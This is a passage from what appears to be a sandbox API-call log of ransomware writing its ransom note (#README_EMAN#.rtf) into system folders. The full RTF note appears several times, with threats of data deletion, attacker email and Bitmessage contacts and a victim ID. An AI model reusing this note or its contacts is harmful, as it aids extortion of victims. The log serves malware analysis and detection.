th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0221.302] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x764048, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x83\x06", lpUsedDefaultChar=0x0) returned 8717 [0221.302] WriteFile (in: hFile=0x2d0, lpBuffer=0x764048*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x764048*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0221.303] CloseHandle (hObject=0x2d0) returned 1 [0221.303] GetFileAttributesW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\oracle\\java\\javapath_target_5923062\\#readme_eman#.rtf")) returned 0x20 [0221.303] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\#readme_eman#.rtf")) returned 0xffffffff [0221.464] GetLastError () returned 0x2 [0221.464] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0221.464] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring 